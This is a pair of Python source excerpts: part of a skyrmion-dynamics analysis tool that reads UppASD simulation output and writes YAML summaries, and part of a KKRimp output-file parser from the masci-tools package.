- dpi: (float) dpi of the figures printed.
- height: (float) height of the figures printed.
- width: (float) width of the figures printed.
- fontsize: (float) size of the fonts used in the plots.
- zoom_factor: (float) how zoomed to the skyrmion the profile is
Returns
----------
- Skx_control: (dict) dictionary containing all the needed control parameters
Author
----------
<NAME>
"""
import yaml
import sys
import numpy as np
print("#"*80)
print("# Welcome to APyInSky!")
print("#"*80)
try:
with open("Skx_inp.yml", 'r') as stream:
Skx_inp = yaml.load(stream)
except:
print("No 'Skx_inp.yml' file found. Shutting down")
sys.exit()
Skx_control=update(Skx_control,Skx_inp)
del Skx_inp
# Transform the list to a numpy array for easier manipulation
try:
Skx_control['Data_control']['Misc']['imp_pos']=\
np.asarray(Skx_control['Data_control']['Misc']['imp_pos'])
# Multiply by the lattice constant to be able to place it correctly in the plots
Skx_control['Data_control']['Misc']['imp_pos']=\
Skx_control['Data_control']['Misc']['alat']*Skx_control['Data_control']['Misc']['imp_pos']
except:
pass
try:
Skx_control['Data_control']['Skyrmion_velocity']['time_step']=\
float(Skx_control['Data_control']['Skyrmion_velocity']['time_step'])
except:
Skx_control['Data_control']['Skyrmion_velocity']['time_step']=1e-16
print('No time step given. Assuming 1e-16 s')
try:
if len(Skx_control['Data_control']['file_name'])>1:
Skx_control['Data_control']['file_name']=\
'_'+Skx_control['Data_control']['file_name']
except:
pass
return Skx_control
def update(d, u):
import collections
""" Recursive function to update the keys of a dictionary such that if no values are given in the input the defaults are used. Small modificaions of the routine presented in
https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth
"""
for k, v in u.items():
if isinstance(v, collections.Mapping):
d[k] = update(d.get(k, {}), v)
else:
d[k] = v
return d
def set_control_defaults():
"""
Function to define the default values of the parameters, such that if the user does not define something the code can still be safely used.
Author
----------
<NAME>
"""
Skx_control=dict()
Skx_control['Fig_control']=dict()
Skx_control['Fig_control']['dpi']=800
Skx_control['Fig_control']['height']=10
Skx_control['Fig_control']['width']=16
Skx_control['Fig_control']['fontsize']=28
Skx_control['Fig_control']['zoom_factor']=0.15
Skx_control['Fig_control']['tex_fonts']=False
Skx_control['Data_control']=dict()
Skx_control['Data_control']['path']='./'
Skx_control['Data_control']['out_path']='./'
Skx_control['Data_control']['Misc']=dict()
Skx_control['Data_control']['Misc']['alat']=0.392
Skx_control['Data_control']['Misc']['imp_pos']=[]
Skx_control['Data_control']['Misc']['zipped']=False
Skx_control['Data_control']['Misc']['sub_index']=0
Skx_control['Data_control']['Misc']['gridpoint']=[500,500]
Skx_control['Data_control']['Topology']=dict()
Skx_control['Data_control']['Topology']['execute']=False
Skx_control['Data_control']['Skyrmion_velocity']=dict()
Skx_control['Data_control']['Skyrmion_velocity']['execute']=False
Skx_control['Data_control']['Skyrmion_velocity']['time_step']=float(1e-16)
Skx_control['Data_control']['Skyrmion_velocity']['plot']=False
Skx_control['Data_control']['Skyrmion_velocity']['plot_energy']=False
Skx_control['Data_control']['Skyrmion_velocity']['comp_energy']=False
Skx_control['Data_control']['profile']=dict()
Skx_control['Data_control']['profile']['execute']=False
Skx_control['Data_control']['Skx_threshold']=0.8
Skx_control['Data_control']['file_name']=''
return Skx_control
def SK_overview(file_name,pos_bare,pos_grid,pos_filt,vel_bare,vel_bare_mod, \
vel_grid,vel_grid_mod,vel_filt,vel_filt_mod,vel_smooth,vel_smooth_mod, \
rad_bare,rad_grid):
"""Function to write in a dictionary relevant quantities of the positions, velocities, and radii
of the skyrmion.
Args
----------
- out_folder: (str) path for the output file
- pos_bare: (float [N,3] array) positions of the skyrmion core from bare data
- pos_grid: (float [N,3] array) positions of the skyrmion core from interpolated data
- pos_filt: (float [N,3] array) positions of the skyrmion core from smoothed data
- vel_bare: (float [N,3] array) velocity of the skyrmion from bare data
- vel_bare_mod: (float [N] array) speed of the skyrmion from bare data
- vel_grid: (float [N,3] array) velocity of the skyrmion from interpolated data
- vel_grid_mod: (float [N] array) speed of the skyrmion from interpolated data
- vel_filt: (float [N,3] array) velocity of the skyrmion from filtered data
- vel_filt_mod: (float [N] array) speed of the skyrmion from filtered data
- vel_smooth: (float [N,3] array) velocity of the skyrmion from smooth data
- vel_smooth_mod: (float [N] array) speed of the skyrmion from smooth data
- rad_bare: (float [N] array) radius of the skyrmion from bare data
- rad_grid: (float [N] array) radius of the skyrmion from interpolated data
Author
----------
<NAME>
"""
import numpy as np
import yaml
from collections import OrderedDict
ten_perc=int(len(vel_grid)*0.1)
ninety_perc=int(len(vel_grid)*0.9)
SK_summary=OrderedDict()
#---------------------------------------------------------------------------
# Position dictionary
#---------------------------------------------------------------------------
SK_summary['core_position']=OrderedDict()
SK_summary['core_position']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare positions
#---------------------------------------------------------------------------
SK_summary['core_position']['method']['bare']=OrderedDict()
SK_summary['core_position']['method']['bare']['min']=[ \
float(np.amin(pos_bare[:,0])),\
float(np.amin(pos_bare[:,1])),\
float(np.amin(pos_bare[:,2]))\
]
SK_summary['core_position']['method']['bare']['max']=[ \
float(np.amax(pos_bare[:,0])),\
float(np.amax(pos_bare[:,1])),\
float(np.amax(pos_bare[:,2]))\
]
SK_summary['core_position']['method']['bare']['mean']=[ \
float(np.mean(pos_bare[:,0])),\
float(np.mean(pos_bare[:,1])),\
float(np.mean(pos_bare[:,2]))\
]
#---------------------------------------------------------------------------
# Grid positions
#---------------------------------------------------------------------------
SK_summary['core_position']['method']['grid']=OrderedDict()
SK_summary['core_position']['method']['grid']['min']=[ \
float(np.amin(pos_grid[:,0])),\
float(np.amin(pos_grid[:,1])),\
float(np.amin(pos_grid[:,2]))\
]
SK_summary['core_position']['method']['grid']['max']=[ \
float(np.amax(pos_grid[:,0])),\
float(np.amax(pos_grid[:,1])),\
float(np.amax(pos_grid[:,2]))\
]
SK_summary['core_position']['method']['grid']['mean']=[ \
float(np.mean(pos_grid[:,0])),\
float(np.mean(pos_grid[:,1])),\
float(np.mean(pos_grid[:,2]))\
]
#---------------------------------------------------------------------------
# Filtered positions
#---------------------------------------------------------------------------
SK_summary['core_position']['method']['filt']=OrderedDict()
SK_summary['core_position']['method']['filt']['min']=[ \
float(np.amin(pos_filt[:,0])),\
float(np.amin(pos_filt[:,1])),\
float(np.amin(pos_filt[:,2]))\
]
SK_summary['core_position']['method']['filt']['max']=[ \
float(np.amax(pos_filt[:,0])),\
float(np.amax(pos_filt[:,1])),\
float(np.amax(pos_filt[:,2]))\
]
SK_summary['core_position']['method']['filt']['mean']=[ \
float(np.mean(pos_filt[:,0])),\
float(np.mean(pos_filt[:,1])),\
float(np.mean(pos_filt[:,2]))\
]
#---------------------------------------------------------------------------
# Velocity dictionary
#---------------------------------------------------------------------------
SK_summary['vel']=OrderedDict()
SK_summary['vel']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['bare']=OrderedDict()
SK_summary['vel']['method']['bare']['min']=[ \
float(np.amin(vel_bare[:,0])),\
float(np.amin(vel_bare[:,1])),\
float(np.amin(vel_bare[:,2]))\
]
SK_summary['vel']['method']['bare']['max']=[ \
float(np.amax(vel_bare[:,0])),\
float(np.amax(vel_bare[:,1])),\
float(np.amax(vel_bare[:,2]))\
]
SK_summary['vel']['method']['bare']['mean']=[ \
float(np.mean(vel_bare[:,0])),\
float(np.mean(vel_bare[:,1])),\
float(np.mean(vel_bare[:,2]))\
]
SK_summary['vel']['method']['bare']['t_ini']=[ \
float(np.mean(vel_bare[0:ten_perc,0])),\
float(np.mean(vel_bare[0:ten_perc,1])),\
float(np.mean(vel_bare[0:ten_perc,2]))\
]
SK_summary['vel']['method']['bare']['t_fin']=[ \
float(np.mean(vel_bare[ninety_perc:,0])),\
float(np.mean(vel_bare[ninety_perc:,1])),\
float(np.mean(vel_bare[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Interpolated Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['grid']=OrderedDict()
SK_summary['vel']['method']['grid']['min']=[ \
float(np.amin(vel_grid[:,0])),\
float(np.amin(vel_grid[:,1])),\
float(np.amin(vel_grid[:,2]))\
]
SK_summary['vel']['method']['grid']['max']=[ \
float(np.amax(vel_grid[:,0])),\
float(np.amax(vel_grid[:,1])),\
float(np.amax(vel_grid[:,2]))\
]
SK_summary['vel']['method']['grid']['mean']=[ \
float(np.mean(vel_grid[:,0])),\
float(np.mean(vel_grid[:,1])),\
float(np.mean(vel_grid[:,2]))\
]
SK_summary['vel']['method']['grid']['t_ini']=[ \
float(np.mean(vel_grid[0:ten_perc,0])),\
float(np.mean(vel_grid[0:ten_perc,1])),\
float(np.mean(vel_grid[0:ten_perc,2]))\
]
SK_summary['vel']['method']['grid']['t_fin']=[ \
float(np.mean(vel_grid[ninety_perc:,0])),\
float(np.mean(vel_grid[ninety_perc:,1])),\
float(np.mean(vel_grid[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Filtered Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['filt']=OrderedDict()
SK_summary['vel']['method']['filt']['min']=[ \
float(np.amin(vel_filt[:,0])),\
float(np.amin(vel_filt[:,1])),\
float(np.amin(vel_filt[:,2]))\
]
SK_summary['vel']['method']['filt']['max']=[ \
float(np.amax(vel_filt[:,0])),\
float(np.amax(vel_filt[:,1])),\
float(np.amax(vel_filt[:,2]))\
]
SK_summary['vel']['method']['filt']['mean']=[ \
float(np.mean(vel_filt[:,0])),\
float(np.mean(vel_filt[:,1])),\
float(np.mean(vel_filt[:,2]))\
]
SK_summary['vel']['method']['filt']['t_ini']=[ \
float(np.mean(vel_filt[0:ten_perc,0])),\
float(np.mean(vel_filt[0:ten_perc,1])),\
float(np.mean(vel_filt[0:ten_perc,2]))\
]
SK_summary['vel']['method']['filt']['t_fin']=[ \
float(np.mean(vel_filt[ninety_perc:,0])),\
float(np.mean(vel_filt[ninety_perc:,1])),\
float(np.mean(vel_filt[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Smooth Velocity
#---------------------------------------------------------------------------
SK_summary['vel']['method']['smooth']=OrderedDict()
SK_summary['vel']['method']['smooth']['min']=[ \
float(np.amin(vel_smooth[:,0])),\
float(np.amin(vel_smooth[:,1])),\
float(np.amin(vel_smooth[:,2]))\
]
SK_summary['vel']['method']['smooth']['max']=[ \
float(np.amax(vel_smooth[:,0])),\
float(np.amax(vel_smooth[:,1])),\
float(np.amax(vel_smooth[:,2]))\
]
SK_summary['vel']['method']['smooth']['mean']=[ \
float(np.mean(vel_smooth[:,0])),\
float(np.mean(vel_smooth[:,1])),\
float(np.mean(vel_smooth[:,2]))\
]
SK_summary['vel']['method']['smooth']['t_ini']=[ \
float(np.mean(vel_smooth[0:ten_perc,0])),\
float(np.mean(vel_smooth[0:ten_perc,1])),\
float(np.mean(vel_smooth[0:ten_perc,2]))\
]
SK_summary['vel']['method']['smooth']['t_fin']=[ \
float(np.mean(vel_smooth[ninety_perc:,0])),\
float(np.mean(vel_smooth[ninety_perc:,1])),\
float(np.mean(vel_smooth[ninety_perc:,2]))\
]
#---------------------------------------------------------------------------
# Speed dictionary
#---------------------------------------------------------------------------
SK_summary['speed']=OrderedDict()
SK_summary['speed']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['bare']=OrderedDict()
SK_summary['speed']['method']['bare']['min']=float(np.amin(vel_bare_mod))
SK_summary['speed']['method']['bare']['max']=float(np.amax(vel_bare_mod))
SK_summary['speed']['method']['bare']['mean']=float(np.mean(vel_bare_mod))
SK_summary['speed']['method']['bare']['t_ini']= \
float(np.mean(vel_bare_mod[0:ten_perc]))
SK_summary['speed']['method']['bare']['t_fin']= \
float(np.mean(vel_bare_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Interpolated Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['grid']=OrderedDict()
SK_summary['speed']['method']['grid']['min']=float(np.amin(vel_grid_mod))
SK_summary['speed']['method']['grid']['max']=float(np.amax(vel_grid_mod))
SK_summary['speed']['method']['grid']['mean']=float(np.mean(vel_grid_mod))
SK_summary['speed']['method']['grid']['t_ini']= \
float(np.mean(vel_grid_mod[0:ten_perc]))
SK_summary['speed']['method']['grid']['t_fin']= \
float(np.mean(vel_grid_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Filtered Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['filt']=OrderedDict()
SK_summary['speed']['method']['filt']['min']=float(np.amin(vel_filt_mod))
SK_summary['speed']['method']['filt']['max']=float(np.amax(vel_filt_mod))
SK_summary['speed']['method']['filt']['mean']=float(np.mean(vel_filt_mod))
SK_summary['speed']['method']['filt']['t_ini']= \
float(np.mean(vel_filt_mod[0:ten_perc]))
SK_summary['speed']['method']['filt']['t_fin']= \
float(np.mean(vel_filt_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Smooth Speed
#---------------------------------------------------------------------------
SK_summary['speed']['method']['smooth']=OrderedDict()
SK_summary['speed']['method']['smooth']['min']= \
float(np.amin(vel_smooth_mod))
SK_summary['speed']['method']['smooth']['max']= \
float(np.amax(vel_smooth_mod))
SK_summary['speed']['method']['smooth']['mean']= \
float(np.mean(vel_smooth_mod))
SK_summary['speed']['method']['smooth']['t_ini']= \
float(np.mean(vel_smooth_mod[0:ten_perc]))
SK_summary['speed']['method']['smooth']['t_fin']= \
float(np.mean(vel_smooth_mod[ninety_perc:]))
#---------------------------------------------------------------------------
# Radius dictionary
#---------------------------------------------------------------------------
SK_summary['radius']=OrderedDict()
SK_summary['radius']['method']=OrderedDict()
#---------------------------------------------------------------------------
# Bare Velocity
#---------------------------------------------------------------------------
SK_summary['radius']['method']['bare']=OrderedDict()
SK_summary['radius']['method']['bare']['min']=float(np.amin(rad_bare))
SK_summary['radius']['method']['bare']['max']=float(np.amax(rad_bare))
SK_summary['radius']['method']['bare']['mean']=float(np.mean(rad_bare))
SK_summary['radius']['method']['bare']['t_ini']= \
float(np.mean(rad_bare[0:ten_perc]))
SK_summary['radius']['method']['bare']['t_fin']= \
float(np.mean(rad_bare[ninety_perc:]))
#---------------------------------------------------------------------------
# Interpolated Velocity
#---------------------------------------------------------------------------
SK_summary['radius']['method']['grid']=OrderedDict()
SK_summary['radius']['method']['grid']['min']=float(np.amin(rad_grid))
SK_summary['radius']['method']['grid']['max']=float(np.amax(rad_grid))
SK_summary['radius']['method']['grid']['mean']=float(np.mean(rad_grid))
SK_summary['radius']['method']['grid']['t_ini']= \
float(np.mean(rad_grid[0:ten_perc]))
SK_summary['radius']['method']['grid']['t_fin']= \
float(np.mean(rad_grid[ninety_perc:]))
#---------------------------------------------------------------------------
# Seeting options for the yaml file and printing to file
#---------------------------------------------------------------------------
yaml.add_representer(OrderedDict, lambda dumper, data: dumper.represent_mapping('tag:yaml.org,2002:map', data.items()))
with open(file_name, 'w') as outfile:
yaml.dump(SK_summary, outfile,default_flow_style=False)
del SK_summary
return
def SK_static_overview(file_name,topo_charge,pos,rad,deviation):
"""
Writing key information from the static profile to file to a yaml file for ease of access.
Args
----------
- file_name: (str) name of the output file.
- topo_charge: (float) topological charge of the configuration.
- pos: (float [2] array) position of the skyrmion core
- rad: (float) radius of the skyrmion
- deviation: (float) deviation from a perfect circle
Author
----------
<NAME>
"""
import yaml
from collections import OrderedDict
SK_summary=OrderedDict()
SK_summary['radius']=float(rad)
SK_summary['topo_charge']=float(topo_charge)
SK_summary['deviation']=float(deviation)
SK_summary['core_pos']=[float(pos[0]),float(pos[1])]
yaml.add_representer(OrderedDict, lambda dumper, data: dumper.represent_mapping('tag:yaml.org,2002:map', data.items()))
with open(file_name, 'w') as outfile:
yaml.dump(SK_summary, outfile,default_flow_style=False)
del SK_summary
return
def file_handler(path,zipped,file_prefix,file_suffix='.out'):
"""File wrapper to read, untar and extract the necessary data for the given function that is being analysed.
Args
----------
- path: (str) path to the desired folder
- zipped: (boolean) indicating if the data is in a tar.gz
- file_prefix: (str) prefix of the file that one wishes to extract data from.
* coord: coordinates of all the atoms in the simulation box
* restart: magnetic configuration of all the atoms in the simulation box.
* moment: time evolution of the magnetic configuration for all the atoms in the simulation box.
* posfile_clus: position of the atoms in the cluster.
* totenergy: total energy per atom in the system.
* rate_if: barriers and pre-factors from the GNEB calculation.
* enfit_path: fitted energy landscape from GENB.
* localenergy: site dependent energy
- file_suffix: (str) suffix of the file to discriminate between input and output files that have the same prefix (default='out')
Returns
----------
- data: numpy array containing the data extracted from the file.
Author
----------
<NAME>
"""
import glob
import tarfile
import pandas as pd
import numpy as np
# If the file is in a tar.gz special care must be paid to it
if zipped:
# Find the name of the tar.gz file and pick the first one found, as there should only be one
file_name=glob.glob(path+'/'+"*.tar.gz")[0]
tar_data=tarfile.open(file_name)
names=tar_data.getnames()
members=tar_data.getmembers()
# Find the first file which corresponds to the pattern that one is searching for
tmp_name=pd.Series(names)
target_file=tmp_name[tmp_name.str.match(file_prefix)].values
# Make sure the suffix is included too
target_file = [s for s in target_file if file_suffix in s]
ind=names.index(target_file[0])
data_file = tar_data.extractfile(members[ind])
else:
data_file=glob.glob(path+'/'+file_prefix+'*'+file_suffix)[0]
(skiprows,columns)=set_format(data_file,file_prefix,zipped)
# Extract the needed data
data=pd.read_csv(data_file,header=None,delim_whitespace=True, \
usecols=columns,skiprows=skiprows).values
return data
def set_format(data_file,file_prefix,zipped):
"""Function to determine if the UppASD data is in the new or legacy format. Determines the number of columns that are used and the number of rows that must be skipped.
Args
----------
- data_file: file identifier which is currently being read.
- file_preffix: (str) name of file which is being read.
- zipped: (boolean) indicating if the data is in a tar.gz
Returns
----------
- skiprows: (int) number of lines to be skipped when read
- columns: (list) list with the number of the columns that are read for each type of file
Author
----------
<NAME>
"""
import numpy as np
import pandas as pd
line = pd.read_csv(data_file,header=None,delim_whitespace=True,nrows=1, \
usecols=[0]).values
try:
data_file.seek(0)
except:
pass
#---------------------------------------------------------------------------
# Check whether the file is in the new or old fmt
#---------------------------------------------------------------------------
try:
comp=str(line[0,0])[0]
except:
comp=str(line)
if comp=='#':
type_fmt='new'
else:
type_fmt='old'
if file_prefix=='coord':
columns=[1,2,3]
skiprows=0
if file_prefix=='restart':
if type_fmt=='new':
columns=[4,5,6]
skiprows=7
else:
columns=[3,4,5]
skiprows=1
if file_prefix=='moment':
if type_fmt=='new':
columns=[0,4,5,6]
skiprows=7
else:
columns=[0,2,3,4]
skiprows=0
if file_prefix=='posfile_clus':
columns=[2,3,4]
skiprows=0
if file_prefix=='totenergy':
columns=[1]
skiprows=1
if file_prefix=='rate_if':
columns=[0,1]
skiprows=1
if file_prefix=='enfit_path':
columns=[1,2]
skiprows=1
if file_prefix=='localenergy':
skiprows=1
columns=[3,4,6]
return skiprows,columns
``` |
{
"source": "JPchico/masci-tools",
"score": 2
} |
#### File: io/parsers/kkrimp_parser_functions.py
```python
from __future__ import print_function, division
from __future__ import absolute_import
from builtins import object
from numpy import array, ndarray, loadtxt
from masci_tools.io.common_functions import search_string, open_general, get_version_info, get_Ry2eV, convert_to_pystd
from masci_tools.io.parsers.kkrparser_functions import get_rms, find_warnings, get_charges_per_atom, get_core_states
from six.moves import range
__copyright__ = (u"Copyright (c), 2018, Forschungszentrum Jülich GmbH,"
"IAS-1/PGI-1, Germany. All rights reserved.")
__license__ = "MIT license, see LICENSE.txt file"
__version__ = "0.5"
__contributors__ = (u"<NAME>",
u"<NAME>")
####################################################################################
class kkrimp_parser_functions(object):
"""
Class of parser functions for KKRimp calculation
:usage: success, msg_list, out_dict = parse_kkrimp_outputfile().parse_kkrimp_outputfile(out_dict, files)
"""
### some helper functions ###
def _get_econt_info(self, out_log):
"""
extract energy contour information from out_log file
:param out_log: file that is parsed
:retuns: econt (dict), dictionary containing the energy contour info
:note: econt contains the following keys
* 'emin', bottom of energy contour
* 'Nepts', number of points in energy contour
* 'epts', list of complex valued energy points
* 'weights', list of complex valued weights for energy integration
"""
f = open_general(out_log)
tmptxt = f.readlines()
f.close()
econt = {}
itmp = search_string('[read_energy] number of energy points', tmptxt)
if itmp>=0: econt['Nepts'] = int(tmptxt.pop(itmp).split()[-1])
itmp = search_string('energies and weights are:', tmptxt)
if itmp>=0:
tmp = []
for ie in range(econt['Nepts']):
tmpline = tmptxt[itmp+4+ie].split()[1:]
tmp.append([float(tmpline[0]), float(tmpline[1]), float(tmpline[2]), float(tmpline[3])])
tmp = array(tmp)
econt['epts'] = tmp[:,:2]
econt['weights'] = tmp[:,2:]
econt['emin'] = tmp[0,0]
return econt
def _get_scfinfo(self, file):
"""
extract scf infos (nunmber of iterations, max number of iterations, mixing info) from file
:param file:
:returns: niter (int), nitermax (int), converged (bool), nmax_reached (bool), mixinfo (dict)
:note: mixinfo contains information on mixing scheme and mixing factor used in the calculation
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
# get rms and number of iterations
itmp, niter, rms = 0, -1, -1
while itmp >= 0:
itmp = search_string('average rms-error', tmptxt)
if itmp >= 0:
tmp = tmptxt.pop(itmp).replace('D', 'E').split()
niter = int(tmp[1])
rms = float(tmp[-1])
# get max number of scf steps
itmp = search_string('SCFSTEPS', tmptxt)
if itmp >= 0:
nitermax = int(tmptxt.pop(itmp).split()[-1])
# get qbound
itmp = search_string('QBOUND', tmptxt)
if itmp >= 0:
qbound = float(tmptxt.pop(itmp).split()[-1])
# get imix
itmp = search_string('IMIX', tmptxt)
if itmp >= 0:
imix = int(tmptxt.pop(itmp).split()[-1])
# get mixfac
itmp = search_string('MIXFAC', tmptxt)
if itmp >= 0:
mixfac = float(tmptxt.pop(itmp).split()[-1])
# get fcm
itmp = search_string('FCM', tmptxt)
if itmp >= 0:
fcm = float(tmptxt.pop(itmp).split()[-1])
# set mixinfo
mixinfo = [imix, mixfac, qbound, fcm]
# set converged and nmax_reached logicals
converged, nmax_reached = False, False
if nitermax==niter: nmax_reached = True
if rms<qbound: converged = True
# return values
return niter, nitermax, converged, nmax_reached, mixinfo
def _get_newsosol(self, file):
"""
Check if spin orbit coupling solver is used
:param file: absolute path to out_log.000.txt of KKRimp calculation
:returns: True(False) if SOC solver is (not) used
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = search_string('Spin orbit coupling used?', tmptxt)
itmp = int(tmptxt.pop(itmp).split()[-1])
if itmp==1:
newsosol = True
else:
newsosol = False
return newsosol
def _get_natom(self, file):
"""
Extract number of atoms in impurity cluster
:param file: file that is parsed to find number of atoms
:returns: natom (int), number of atoms in impurity cluster
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = search_string('NATOM is', tmptxt)
natom = int(tmptxt.pop(itmp).split()[-1])
return natom
def _get_magtot(self, file):
"""
Extract total magnetic moment ofall atoms in imp. cluster
:param file: file that is parsed to find magnetic moments
:returns: list of total magnetic moments of all atoms
"""
#TODO implement
return []
def _extract_timings(self, outfile):
"""
Extract timings for the different parts in the KKRimp code
:param outfile: timing file of the KKRimp run
:returns: res (dict) timings in seconds, averaged over iterations
"""
f = open_general(outfile)
tmptxt = f.readlines()
f.close()
search_keys = ['time until scf starts',
'vpot->tmat',
'gref->gmat',
'gonsite->density',
'energyloop',
'Iteration number',
'Total running time']
res = {}
for isearch in search_keys:
tmpval = []
itmp = 0
while itmp>=0:
itmp = search_string(isearch, tmptxt)
if itmp>=0:
tmpval.append(float(tmptxt.pop(itmp).split()[-1]))
if len(tmpval)>0:
res[isearch] = tmpval
# average over iterations
niter = len(res.get(search_keys[-2], []))
if niter>0:
for key in search_keys[1:6]:
res[key] = sum(res[key])/niter
for key in [search_keys[0], search_keys[-1]]:
res[key] = res[key][0]
return res
def _get_nspin(self, file):
"""
Extract nspin from file
:param file: file that is parsed
:returns: 1 if calculation is paramagnetic, 2 otherwise
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = search_string('NSPIN', tmptxt)
nspin = int(tmptxt.pop(itmp).split()[-1])
return nspin
def _get_spinmom_per_atom(self, file, natom):
"""
Extract spin moment for all atoms
:param file: file that is parsed
:param natom: number of atoms in impurity cluster
:returns: spinmom_at (list), spin moments for all atoms
"""
#TODO implement
return spinmom_at
def _get_orbmom_per_atom(self, file, natom):
"""
Extract orbital moment for all atoms
:param file: file that is parsed
:param natom: number of atoms in impurity cluster
:returns: orbmom_at (list), orbital moments for all atoms
"""
#TODO implement
return orbmom_at
def _get_EF_potfile(self, potfile):
"""
Extract EF value from potential file
:param potfile: file that is parsed
:returns: EF (float), value of the Fermi energy in Ry
"""
f = open_general(potfile)
tmptxt = f.readlines()
f.close()
EF = float(tmptxt[3].split()[1])
return EF
def _get_Etot(self, file):
"""
Extract total energy file
:param file: file that is parsed
:returns: Etot (list), values of the total energy in Ry for all iterations
"""
f = open_general(file)
tmptxt = f.readlines()
f.close()
itmp = 0
Etot = []
while itmp >= 0:
itmp = search_string('TOTAL ENERGY', tmptxt)
if itmp >= 0:
Etot.append(float(tmptxt.pop(itmp).split()[-1]))
return Etot
def _get_energies_atom(self, file1, file2, natom):
"""
Extract single particle and total energies in Ry for all atoms from file 1 and file 2
:param file1: file containing all single particle energies
:param file2: file containing all total energies
:returns: esp_at (list), etot_at (list)
"""
esp = loadtxt(file1)
etot = loadtxt(file2)
esp_at = esp[-natom:,1]
etot_at = etot[-natom:,1]
return esp_at, etot_at
### end helper functions ###
def parse_kkrimp_outputfile(self, out_dict, file_dict):
"""
Main parser function for kkrimp, read information from files in file_dict and fills out_dict
:param out_dict: dictionary that is filled with parsed output of the KKRimp calculation
:param file_dict: dictionary of files that are parsed
:returns: success (bool), msg_list(list of error/warning messages of parser), out_dict (filled dict of parsed output)
:note: file_dict should contain the following keys
* 'outfile', the std_out of the KKRimp calculation
* 'out_log', the out_log.000.txt file
* 'out_pot', the output potential
* 'out_enersp_at', the out_energysp_per_atom_eV file
* 'out_enertot_at', the out_energytotal_per_atom_eV file
* 'out_timing', the timing file
* 'kkrflex_llyfac', the file for the Lloyd factor
* 'kkrflex_angles', the nonco_angles file for the KKRimp calculation
* 'out_spinmoms', the output spin moments file
* 'out_orbmoms', the output orbital moments file
"""
Ry2eV = get_Ry2eV()
msg_list = []
files = file_dict
try:
code_version, compile_options, serial_number = get_version_info(files['out_log'])
tmp_dict = {}
tmp_dict['code_version'] = code_version
tmp_dict['compile_options'] = compile_options
tmp_dict['calculation_serial_number'] = serial_number
out_dict['code_info_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: Version Info"
msg_list.append(msg)
tmp_dict = {} # used to group convergence info (rms, rms per atom, charge neutrality)
# also initialize convegence_group where all info stored for all iterations is kept
out_dict['convergence_group'] = tmp_dict
try:
result, result_atoms_last = get_rms(files['outfile'], files['out_log'])
tmp_dict['rms'] = result[-1]
tmp_dict['rms_all_iterations'] = result
tmp_dict['rms_per_atom'] = result_atoms_last
tmp_dict['rms_unit'] = 'unitless'
out_dict['convergence_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: rms-error"
msg_list.append(msg)
tmp_dict = {} # used to group magnetism info (spin and orbital moments)
try:
result = self._get_magtot(files['out_log'])
if len(result)>0:
tmp_dict['total_spin_moment'] = result[-1]
out_dict['convergence_group']['total_spin_moment_all_iterations'] = result
tmp_dict['total_spin_moment_unit'] = 'mu_Bohr'
out_dict['magnetism_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: total magnetic moment"
msg_list.append(msg)
try:
nspin = self._get_nspin(files['out_log'])
natom = self._get_natom(files['out_log'])
newsosol = self._get_newsosol(files['out_log'])
out_dict['nspin'] = nspin
out_dict['number_of_atoms_in_unit_cell'] = natom
out_dict['use_newsosol'] = newsosol
except:
msg = "Error parsing output of KKRimp: nspin/natom"
msg_list.append(msg)
try:
if nspin>1:
#result, vec, angles = get_spinmom_per_atom(outfile, natom, nonco_out_file)
spinmom_atom, spinmom_atom_vec_all_iter, = self._get_spinmom_per_atom(files['out_spinmom'], natom)
if len(result)>0:
tmp_dict['spin_moment_per_atom'] = result[-1,:]
if newsosol:
tmp_dict['spin_moment_vector_per_atom'] = vec[:]
tmp_dict['spin_moment_angles_per_atom'] = angles[:]
tmp_dict['spin_moment_angles_per_atom_unit'] = 'degree'
out_dict['convergence_group']['spin_moment_per_atom_all_iterations'] = result[:,:]
tmp_dict['spin_moment_unit'] = 'mu_Bohr'
out_dict['magnetism_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: spin moment per atom"
msg_list.append(msg)
# add orbital moments to magnetis group in parser output
try:
if nspin>1 and newsosol:
orbmom_atom = self._get_orbmom_per_atom(files['out_orbmom'], natom)
if len(result)>0:
tmp_dict['total_orbital_moment'] = sum(result[-1,:])
tmp_dict['orbital_moment_per_atom'] = result[-1,:]
out_dict['convergence_group']['orbital_moment_per_atom_all_iterations'] = result[:,:]
tmp_dict['orbital_moment_unit'] = 'mu_Bohr'
out_dict['magnetism_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: orbital moment"
msg_list.append(msg)
try:
result = self._get_EF_potfile(files['out_pot'])
out_dict['fermi_energy'] = result
out_dict['fermi_energy_units'] = 'Ry'
except:
msg = "Error parsing output of KKRimp: EF"
msg_list.append(msg)
try:
result = self._get_Etot(files['out_log'])
print(result)
out_dict['energy'] = result[-1]*Ry2eV
out_dict['energy_unit'] = 'eV'
out_dict['total_energy_Ry'] = result[-1]
out_dict['total_energy_Ry_unit'] = 'Rydberg'
out_dict['convergence_group']['total_energy_Ry_all_iterations'] = result
except:
msg = "Error parsing output of KKRimp: total energy"
msg_list.append(msg)
try:
result = find_warnings(files['outfile'])
tmp_dict = {}
tmp_dict['number_of_warnings'] = len(result)
tmp_dict['warnings_list'] = result
out_dict['warnings_group'] = tmp_dict
except:
msg = "Error parsing output of KKRimp: search for warnings"
